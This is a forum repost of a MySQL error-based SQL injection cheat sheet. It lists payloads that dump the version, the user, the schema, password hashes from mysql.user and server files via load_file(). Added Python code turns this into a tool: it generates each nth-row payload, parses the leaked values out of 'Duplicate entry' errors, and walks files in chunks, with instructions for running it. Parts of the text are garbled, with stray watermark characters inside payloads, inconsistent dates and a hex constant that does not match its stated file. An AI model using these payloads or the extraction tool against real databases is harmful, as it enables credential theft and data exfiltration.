MySQL error-based injection reference (pdf)

Posted on 2013-7-27 11:00:46
Last edited by Nightmare on 2013-3-17 14:20

MySQL error-based injection reference (pdf), one post a day...

MySql Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
TeAm: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; works on the great majority of 5.x versions.
A small number of versions throw an error when name_const() is used; for those, test with the Method.2 given below.
Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)
Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Dump the databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n with 0, 1, 2, ... in turn.
Count the tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql
Dump the tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql. Replace n in turn.
Count the columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Dump the columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n in turn.
/ K! m8 h# C: X) @- w依次暴内容:4 d, [# s5 t4 {. M2 e
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche- F1 s* [7 p- j, {9 R4 P
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=11 @: c) L9 ^7 f; k4 c! \
将n顺序替换% Z- e% ^3 j; a
Dump file contents:
and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69 = C:\\boot.ini. Because only 64 bytes of content can be dumped at a time, use substring() to control which bytes are displayed.
Thx for reading.
No need to download it, either.
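Why the Method.2 payloads above error out at all is not explained in the reference, so here is an added example (not code from the reference or its author) that models it. It re-implements MySQL's seeded RAND() as in sql/password.c (randominit and my_rnd, seeded the way Item_func_rand::seed_random does) and the one detail of the temp-table GROUP BY path that matters: the key expression is evaluated once to look a group up and, when the group is new, evaluated again to build the row that gets inserted. With rand(0) the values of floor(rand(0)*2) are a fixed sequence (0, 1, 1, 0, 1, 1, ...), so by the third source row the insert collides with the key already stored, and MySQL reports the whole key, injected value included, in the "Duplicate entry" message. The 64-character cut on that key is the %-.64s in the ER_DUP_ENTRY format string, which is what the 64-byte remark on load_file() refers to.

```python
"""Model of why concat(<value>, floor(rand(0)*2)) ... group by leaks <value>.

Added example, not code from the reference. Re-implements MySQL's seeded
RAND() (randominit/my_rnd from sql/password.c) and the double evaluation of
the GROUP BY key on insert, to show that three rows are enough to force the
"Duplicate entry" error that carries the injected value.
"""

MAX_VALUE = 0x3FFFFFFF          # rand_struct.max_value
KEY_LIMIT = 64                  # ER_DUP_ENTRY formats the key with %-.64s


class MySQLRand:
    """RAND(N), seeded exactly as Item_func_rand::seed_random does."""

    def __init__(self, seed: int) -> None:
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_bits(seed: int, count: int) -> list:
    """The values floor(rand(seed)*2) yields on successive evaluations."""
    rng = MySQLRand(seed)
    return [int(rng.next() * 2) for _ in range(count)]


def simulate_group_by(leak: str, row_count: int, seed: int = 0):
    """Run `select count(*), concat(leak, floor(rand(seed)*2)) x
    from <row_count rows> group by x` the way MySQL's temp-table path does.

    The key is evaluated once to look it up; if it is absent MySQL evaluates
    it a second time to build the row it inserts. Every evaluation advances
    rand(), so the inserted key may not be the one just looked up, and a
    later row can then try to insert a key that already exists.
    Returns the error text MySQL would raise, or None if the query succeeds.
    """
    rng = MySQLRand(seed)
    groups = {}
    for _ in range(row_count):
        key = f"{leak}{int(rng.next() * 2)}"        # lookup evaluation
        if key in groups:
            groups[key] += 1
            continue
        key = f"{leak}{int(rng.next() * 2)}"        # insert evaluation
        if key in groups:
            return f"Duplicate entry '{key[:KEY_LIMIT]}' for key 'group_key'"
        groups[key] = 1
    return None


if __name__ == "__main__":
    print(floor_rand_bits(0, 12))
    for rows in (1, 2, 3):
        print(rows, "rows ->", simulate_group_by("5.0.91", rows))
```

The row source in the reference's payloads is information_schema.tables because it always has far more than the three rows the collision needs; on a version where rand() is evaluated differently, or with an unseeded rand(), the model above shows the error becomes probabilistic instead of guaranteed.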
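The "replace n in turn" steps (databases, tables, columns, rows) and the substring() walk over load_file() are one loop in practice. The following is an added example, not code from the reference: it builds each nth-item payload from the reference's count(*)/rand(0)/group by template, hex-encodes names the way the reference does (0x6D7973716C is mysql, 0x636F6C756D6E735F70726976 is columns_priv, 0x433A5C5C746573742E617361 is C:\\test.asa), and pulls the leaked value back out of the "Duplicate entry" text. It puts the rand digit first in every key, as the reference's version and file payloads do, so that when ER_DUP_ENTRY cuts the key at 64 characters it is the tail of a long value that is lost, not the digit; that is why the file walk uses 63-byte windows. The sample error line in the block is constructed, not captured from a real target.

```python
"""Build the "replace n in turn" payloads and read the leak back out of the
error. Added example, not code from the reference; the sample error text at
the bottom is constructed, not captured from a real target."""
import re

KEY_LIMIT = 64   # ER_DUP_ENTRY prints the colliding key with %-.64s


def mysql_hex(text: str) -> str:
    """'mysql' -> 0x6D7973716C, the quote-free literal the reference uses."""
    return "0x" + text.encode().hex().upper()


def mysql_unhex(literal: str) -> str:
    """Reverse of mysql_hex, for reading the reference's constants."""
    return bytes.fromhex(literal[2:]).decode()


def error_based(inner_select: str) -> str:
    """Wrap a scalar subquery in the count(*)/rand(0)/group by template.

    information_schema.tables is the row source because the trick needs at
    least three rows. The rand digit goes first so that a long value, not the
    digit, is what the 64-character limit on the reported key cuts off.
    """
    return ("and (select 1 from (select count(*),concat(floor(rand(0)*2),"
            f"({inner_select}))x from information_schema.tables group by x)a)")


def schema_payload(n: int) -> str:
    return error_based(
        f"select distinct schema_name from information_schema.schemata limit {n},1")


def table_payload(schema: str, n: int) -> str:
    return error_based(
        "select distinct table_name from information_schema.tables "
        f"where table_schema={mysql_hex(schema)} limit {n},1")


def column_payload(schema: str, table: str, n: int) -> str:
    return error_based(
        "select distinct column_name from information_schema.columns "
        f"where table_schema={mysql_hex(schema)} and table_name={mysql_hex(table)} "
        f"limit {n},1")


def file_payload(path: str, chunk: int) -> str:
    """load_file() output must be walked with substring(): one character of
    the reported key is the rand digit, so 63 bytes of file fit per error."""
    width = KEY_LIMIT - 1
    offset = chunk * width + 1                    # substring() is 1-based
    return error_based(
        f"select substring(load_file({mysql_hex(path)}),{offset},{width})")


_DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key")


def leaked_value(error_text: str):
    """Strip MySQL's framing and the leading floor(rand(0)*2) digit.

    None means there was no duplicate-key error: either the point is not
    injectable this way, or n ran past the last row (the subquery returns
    NULL, concat() then yields NULL, and NULL keys never collide).
    """
    match = _DUP_ENTRY.search(error_text)
    if match is None:
        return None
    return match.group(1)[1:]


if __name__ == "__main__":
    # Constructed response, shaped like MySQL's ER_DUP_ENTRY text.
    sample = "ERROR 1062 (23000): Duplicate entry '1mysql' for key 'group_key'"
    print(table_payload("mysql", 0))
    print(leaked_value(sample))
```

Drive it by sending schema_payload(n) for n = 0, 1, 2, ... until leaked_value() returns None, then descend into table_payload() and column_payload() the same way; for a file, send file_payload(path, chunk) for chunk = 0, 1, ... and concatenate the pieces.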